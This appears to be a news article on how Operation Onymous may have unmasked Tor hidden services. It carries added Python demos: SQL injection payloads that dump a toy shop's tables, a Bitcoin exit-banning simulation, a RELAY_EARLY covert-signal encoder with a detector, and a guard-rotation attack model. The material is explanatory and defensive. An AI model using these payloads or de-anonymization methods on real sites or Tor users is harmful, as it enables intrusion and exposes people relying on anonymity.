In a blog post published on November 9, Tor Project director Andrew Lewman went over the possible ways that more than 400 hidden services on dozens of servers could have been located by law enforcement during Operation Onymous. While some of the servers hosted criminal activity (Silk Road 2.0 among them), at least some did not, including several that were acting as infrastructure for Tor’s anonymizing network. And the only answer Lewman could offer as to how the sites were exposed was “We don’t know.”

That's unnerving not just to the operators of the many illicit sites taken down by Operation Onymous; it’s also a concern for anyone using Tor to evade surveillance by repressive governments. Activists, dissidents, and journalists all rely on the same Tor infrastructure.

“If you are an activist or a journalist in these countries, your government thinks you are a criminal,” Eva Galperin, Global Policy Analyst for the Electronic Frontier Foundation, told Ars. “And you can learn a lot about good operational security practices by watching where criminals go wrong, reading the affidavits on these cases, because your government is treating you as a criminal.”

Again, some of the sites taken down may not have been criminal at all. Doxbin, the hidden service that hosted “doxxes” (postings of personal information about individuals, gathered by various means), was seized the same day as Silk Road 2.0. However, it has not appeared among the sites listed in the Justice Department's filings so far, something Galperin called “really weird.”

Additionally, four Tor exit nodes in Amsterdam and six in a Miami datacenter were taken offline during the joint operation by the FBI, Immigration and Customs Enforcement, and law enforcement agencies of Europol member states. One Tor relay operator, who ran the relay from his home, was reportedly raided by law enforcement agents. Ars has reached out to confirm the report but has not yet received a response from the individual.

Hacking the spew

There has been some speculation that law enforcement may have used some form of denial-of-service attack crafted to exploit a flaw in Tor’s hidden service code, the basis for “darknet” sites and services such as The Hidden Wiki, Silk Road, and Doxbin. However, the operator of Doxbin reported late yesterday that a large portion of what he had taken to be a denial-of-service attack in August was probably caused by a darknet Web crawler. It’s also possible that some of the sites, such as Silk Road 2.0, were located through direct action by an undercover agent working as a site administrator.

There may also have been operational security failures that undid many of the sites, including possible cooperation with law enforcement by their hosting provider. “What’s interesting is that 129 of the hidden services taken down were using the same Bulgarian hosting provider,” Galperin said.

Lewman listed a number of ways the sites could have been exposed, including the kind of operational security lapses that led to the takedown of the original Silk Road. He also suggested that SQL injection and remote file inclusion attacks could have been used against many of the sites, which were “quickly-coded e-shops with a big attack surface.” Either class of bug can betray a hidden server’s real identity: a SQL injection can read configuration tables that name the host or its backup infrastructure, and a file inclusion bug that fetches an attacker-supplied URL can make the server reach out over the clearnet, revealing its IP address.
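As an added illustration of the SQL injection risk Lewman describes (editorial example code, not from the article, from Lewman, or from any of the seized sites), the Python script below builds a constructed two-table shop database in SQLite and runs the same product search two ways: once with the user’s term spliced into the SQL text, the way a hurried e-shop might write it, and once with a bound parameter. Table names, rows, hostnames and payloads are all made up for the example; the payloads use SQLite’s `sqlite_master` catalogue, so the schema-enumeration step is specific to SQLite.

```python
import sqlite3

# Constructed schema for a toy "quickly-coded e-shop": a products table the
# search box is meant to query, and an admin table it is not.  The hostnames
# are reserved .invalid names, not real infrastructure.
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price_btc REAL);
CREATE TABLE admin_config (setting TEXT, value TEXT);
INSERT INTO products VALUES (1, 'widget', 0.01), (2, 'gadget', 0.05);
INSERT INTO admin_config VALUES
    ('backup_host', 'backup.example.invalid'),
    ('admin_email', 'admin@example.invalid');
"""


def build_shop_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, term):
    """The user's term is spliced straight into the SQL text, so a quote
    character in the term ends the string literal and the rest is parsed
    as SQL."""
    sql = "SELECT name, price_btc FROM products WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Same query with a bound parameter: the term is data, never SQL."""
    sql = "SELECT name, price_btc FROM products WHERE name LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


# Payloads an attacker might type into the search box.  The first lists the
# tables in the database (SQLite exposes the schema through sqlite_master);
# the second dumps the table the first one revealed.  The trailing '--'
# comments out the remainder of the original query so the spliced statement
# still parses.
ENUMERATE_TABLES = "' UNION SELECT name, sql FROM sqlite_master --"
DUMP_ADMIN = "' UNION SELECT setting, value FROM admin_config --"


def attacker_view(conn, search):
    """Run both payloads through a search function and return what leaks:
    the set of names in the first column and a dict of the second payload's
    rows (product rows come back too, mixed in with the stolen ones)."""
    leaked_names = {row[0] for row in search(conn, ENUMERATE_TABLES)}
    leaked_config = {row[0]: row[1] for row in search(conn, DUMP_ADMIN)}
    return leaked_names, leaked_config


if __name__ == "__main__":
    db = build_shop_db()
    print("vulnerable:   ", attacker_view(db, search_vulnerable))
    print("parameterized:", attacker_view(db, search_safe))
```

Against `search_vulnerable` the two payloads return the table names and then the `backup_host` row, which is exactly the kind of clearnet identifier that undoes a hidden service; against `search_safe` the same payloads are just a pattern no product name matches, and both return nothing.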

There’s also the possibility that Bitcoin transactions passing through the sites were de-anonymized. In research published in October, Ivan Pustogarov and Alex Biryukov of the University of Luxembourg found that “A low-resource attacker can gain full control of information flows between all users who chose to use Bitcoin over Tor.” “In particular the attacker can link together user’s transactions regardless of pseudonyms used, control which Bitcoin blocks and transactions are relayed to the user and can delay or discard user’s transactions and blocks,” the authors wrote.

According to Pustogarov and Biryukov, using Bitcoin over Tor makes it possible to mount a man-in-the-middle attack on a client’s view of the block chain. The lever is Bitcoin’s built-in denial-of-service protection, which bans the IP address of any peer that sends it malformed messages. By sending such messages through a chosen exit, “an attacker is able to force specific Bitcoin peers to ban Tor Exit nodes of her choice,” they wrote. Repeating that for every exit she does not control leaves the attacker’s own exits as the only ones Bitcoin peers will still accept connections from, funnelling all Bitcoin-over-Tor traffic through them.
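The ban mechanism the paper abuses can be modelled in a few dozen lines. The Python simulation below is an added example, not code from the paper or from Bitcoin Core. It assumes Bitcoin Core’s default thresholds of the time (a misbehavior score of 100 triggers a 24-hour ban of the source IP, and one malformed message scores 100), chooses exits uniformly rather than by bandwidth as Tor really does, and uses constructed addresses from the TEST-NET-2 documentation range for the exits. It measures what share of a Tor-using client’s Bitcoin connections leave through attacker-controlled exits before the attack, after it, and once the bans have lapsed.

```python
import random

# Bitcoin Core defaults at the time of the paper (assumed here, not taken from
# the article): a source IP whose misbehavior score reaches -banscore=100 is
# refused for -bantime=86400 seconds, and one malformed message scores 100.
BAN_THRESHOLD = 100
BAN_SECONDS = 86400
MALFORMED_PENALTY = 100


class BitcoinPeer:
    """Minimal model of a Bitcoin node's per-IP misbehavior scoring."""

    def __init__(self, name):
        self.name = name
        self.score = {}         # src_ip -> accumulated misbehavior score
        self.banned_until = {}  # src_ip -> time at which the ban lifts

    def accepts(self, src_ip, now):
        return self.banned_until.get(src_ip, 0) <= now

    def receive(self, src_ip, msg, now):
        """Return True if the message is processed, False if refused."""
        if not self.accepts(src_ip, now):
            return False
        if msg == "malformed":
            self.score[src_ip] = self.score.get(src_ip, 0) + MALFORMED_PENALTY
            if self.score[src_ip] >= BAN_THRESHOLD:
                self.banned_until[src_ip] = now + BAN_SECONDS
            return False
        return True


def poison_exits(peers, exits, attacker_exits, now):
    """Attacker step: through every exit she does NOT own, send one malformed
    message to every peer, so each peer bans that exit's IP address."""
    for exit_ip in exits:
        if exit_ip in attacker_exits:
            continue
        for peer in peers:
            peer.receive(exit_ip, "malformed", now)


def victim_connect(peers, exits, now, rng, max_tries=500):
    """A Bitcoin client on Tor: pick a circuit (exit) and a peer at random and
    retry on a fresh circuit whenever the peer refuses the connection.
    Uniform exit choice stands in for Tor's bandwidth-weighted selection."""
    for _ in range(max_tries):
        exit_ip = rng.choice(exits)
        peer = rng.choice(peers)
        if peer.accepts(exit_ip, now):
            return exit_ip, peer.name
    return None, None


def attacker_share(peers, exits, attacker_exits, now, rng, n=200):
    """Fraction of the victim's successful connections that leave Tor through
    an attacker-controlled exit."""
    hits = sum(victim_connect(peers, exits, now, rng)[0] in attacker_exits
               for _ in range(n))
    return hits / n


def simulate(n_exits=20, n_attacker=2, n_peers=8, seed=7):
    rng = random.Random(seed)
    # Constructed exit addresses from the 198.51.100.0/24 documentation range.
    exits = [f"198.51.100.{i}" for i in range(1, n_exits + 1)]
    attacker_exits = set(exits[:n_attacker])
    peers = [BitcoinPeer(f"peer{i}") for i in range(n_peers)]
    before = attacker_share(peers, exits, attacker_exits, 0, rng)
    poison_exits(peers, exits, attacker_exits, 0)
    after = attacker_share(peers, exits, attacker_exits, 0, rng)
    # Bans lapse after 24 hours, so the attacker simply repeats the step daily.
    lifted = attacker_share(peers, exits, attacker_exits, BAN_SECONDS + 1, rng)
    return before, after, lifted


if __name__ == "__main__":
    print(simulate())
```

With 2 of 20 exits under attacker control the victim lands on them about 10% of the time before the attack and 100% of the time afterwards, until the bans expire a day later. The cost to the attacker is one malformed message per (honest exit, peer) pair per day, which is what the paper means by a low-resource attacker.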

Breaking the network

Lewman noted that it’s possible law enforcement attacked the Tor network itself to make the servers they targeted easier to de-anonymize. On July 4, the Tor Project identified a group of relays that were actively trying to break the anonymity of users by tampering with the Tor protocol headers of traffic passing through them.

The rogue relays were set up on January 30, 2014, just two weeks after Blake Benthall allegedly announced he had taken control of Silk Road 2.0 and shortly after the Homeland Security undercover officer who infiltrated Silk Road 2.0 began getting paid to be a site administrator. The relays could have de-anonymized some users, and they also “probably tried to learn who published hidden service descriptors, which would allow the attackers to learn the location of that hidden service,” Tor project leader Roger Dingledine wrote in a July 30 blog post.
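The July 30 advisory described the header tampering as a traffic-confirmation signal: the rogue relays, when acting as hidden service directories, encoded the hidden service’s name into the sequence of RELAY and RELAY_EARLY cell types they sent down the circuit, and colluding relays at the guard position watched for that pattern. The Python below is an added example of that covert channel and of the per-circuit check Tor shipped in response (tear down any circuit that receives a RELAY_EARLY cell in the inbound direction). It is neither the attackers’ code nor Tor’s; it takes the cell command values from tor-spec (3 = RELAY, 9 = RELAY_EARLY, at most eight outbound RELAY_EARLY cells per circuit), and the onion name is constructed.

```python
# Tor link-protocol cell command values (from tor-spec; stated as an
# assumption in the lead-in): 3 = RELAY, 9 = RELAY_EARLY.  An honest circuit
# builder sends at most eight RELAY_EARLY cells, all in the outbound direction.
RELAY = 3
RELAY_EARLY = 9
MAX_RELAY_EARLY_OUTBOUND = 8


def encode_signal(onion_name):
    """Attacking HSDir side: emit one cell per bit of the name, using the cell
    command as the channel (RELAY_EARLY for a 1 bit, RELAY for a 0 bit).  The
    cell payloads can be anything; only the header carries the signal."""
    cmds = []
    for byte in onion_name.encode("ascii"):
        for shift in range(7, -1, -1):
            cmds.append(RELAY_EARLY if (byte >> shift) & 1 else RELAY)
    return cmds


def decode_signal(cmds):
    """Colluding guard side: read the command field of each inbound cell on
    the circuit and reassemble the bytes (partial trailing bytes are dropped)."""
    out = bytearray()
    for i in range(0, len(cmds) - len(cmds) % 8, 8):
        byte = 0
        for cmd in cmds[i:i + 8]:
            byte = (byte << 1) | (1 if cmd == RELAY_EARLY else 0)
        out.append(byte)
    return out.decode("ascii", errors="replace")


def circuit_violations(cells):
    """Defender's per-circuit check.  `cells` is a list of (direction, command)
    where direction is "in" (toward the client or hidden service) or "out".
    Returns the reasons the circuit should be torn down; empty means clean."""
    reasons = []
    inbound_early = sum(1 for d, c in cells if d == "in" and c == RELAY_EARLY)
    outbound_early = sum(1 for d, c in cells if d == "out" and c == RELAY_EARLY)
    if inbound_early:
        reasons.append(f"{inbound_early} RELAY_EARLY cells received inbound")
    if outbound_early > MAX_RELAY_EARLY_OUTBOUND:
        reasons.append(f"{outbound_early} RELAY_EARLY cells sent outbound "
                       f"(max {MAX_RELAY_EARLY_OUTBOUND})")
    return reasons


if __name__ == "__main__":
    name = "examplehsv2onion"   # constructed 16-character v2 onion name
    signal = encode_signal(name)
    print(decode_signal(signal))
    print(circuit_violations([("in", c) for c in signal]))
```

The signal survives because cell headers are visible to every relay on the circuit, unlike the encrypted payloads; that is also why the fix is cheap to apply at the receiving end, since a single inbound RELAY_EARLY cell is already a protocol violation.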

Another potential weak point in the Tor network is what is known as a “guard attack.” In an earlier paper by Pustogarov and Biryukov (with University of Luxembourg colleague Ralf-Philipp Weinmann), presented at last year’s IEEE Symposium on Security and Privacy, the researchers described a method for revealing the “guard nodes” of specific hidden services. A guard is the first hop of every circuit a hidden service builds, and it is therefore the only relay in Tor that sees the hidden server’s real IP address. That knowledge, the researchers said, could be used for a “large-scale opportunistic de-anonymization attack capable of revealing IP addresses of a significant fraction of Tor’s hidden services over a one year period of time.”

By targeting a specific hidden service with a relatively low-cost attack on Tor’s hidden service protocol, law enforcement could have “destroyed” that service’s Hidden Services Directory “lookup circuits” and forced it to rebuild them through relays under law enforcement control. Doing so would lead them to the hidden service’s guard node; monitoring (or seizing) that guard would in turn reveal the IP address of the hidden service itself.

Denial-of-service attacks against the hidden services could have a similar effect. A hidden service whose current guard is knocked offline must choose a new one, and if law enforcement controlled a large enough share of the relays eligible to serve as guards (guards are entry points into the network, not exits), each forced rotation would give them a fresh chance of being picked. The first time a law-enforcement relay became the guard, it would see the server’s real IP address.
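To give a feel for the cost of the two-stage attack described in the last three paragraphs (discover the current guard, then force rotations until an attacker relay becomes the guard), the Python simulation below is an added example, not code from the paper. It assumes uniform relay selection where real Tor weights by bandwidth, that an attacker-controlled middle relay learns the guard’s address from the circuit’s previous hop, and that a guard knocked offline is simply replaced by a fresh random one; relay counts and the attacker’s share are made-up parameters.

```python
import random


def simulate_guard_attack(n_relays=1000, attacker_fraction=0.05, seed=3,
                          max_circuits=100_000):
    """Two-stage guard attack on one hidden service (simplified model).

    Stage 1: the service keeps building circuits whose far end the attacker
    controls; whenever the middle relay is hers, the previous hop tells her
    which relay is the service's guard.
    Stage 2: she knocks that guard offline and the service picks a new one.
    If the new guard is hers she now sees the service's real IP address;
    otherwise she goes back to stage 1 to discover the replacement.
    Returns the counts, or compromised=False if the circuit budget runs out.
    """
    rng = random.Random(seed)
    relays = list(range(n_relays))
    evil = set(rng.sample(relays, int(n_relays * attacker_fraction)))

    def pick(exclude=()):
        # Uniform choice stands in for Tor's bandwidth-weighted selection.
        while True:
            r = rng.choice(relays)
            if r not in exclude:
                return r

    guard = pick()
    circuits = rotations = 0
    while guard not in evil:
        if circuits >= max_circuits:
            return {"compromised": False, "circuits_observed": circuits,
                    "guard_rotations": rotations}
        circuits += 1
        middle = pick({guard})
        if middle in evil:      # stage 1 succeeds: the guard is identified
            rotations += 1      # stage 2: DoS the guard, forcing a new pick
            guard = pick({guard})
    return {"compromised": True, "circuits_observed": circuits,
            "guard_rotations": rotations}


def expected_effort(attacker_fraction):
    """Closed form for the same model: the wait for an attacker-owned middle
    and the wait for an attacker-owned guard are both geometric with success
    probability f, so about 1/f circuits per discovery and 1/f rotations."""
    f = attacker_fraction
    return {"circuits_per_discovery": 1 / f, "rotations": 1 / f,
            "circuits_total": 1 / (f * f)}


if __name__ == "__main__":
    print(simulate_guard_attack())
    print(expected_effort(0.05))
```

With 5% of relays, the attacker expects roughly twenty forced rotations and a few hundred observed circuits, which is cheap compared with waiting for the service to rotate guards on its own schedule; that gap is what makes a DoS-driven rotation attractive to an attacker and why long-lived guards matter to the defence.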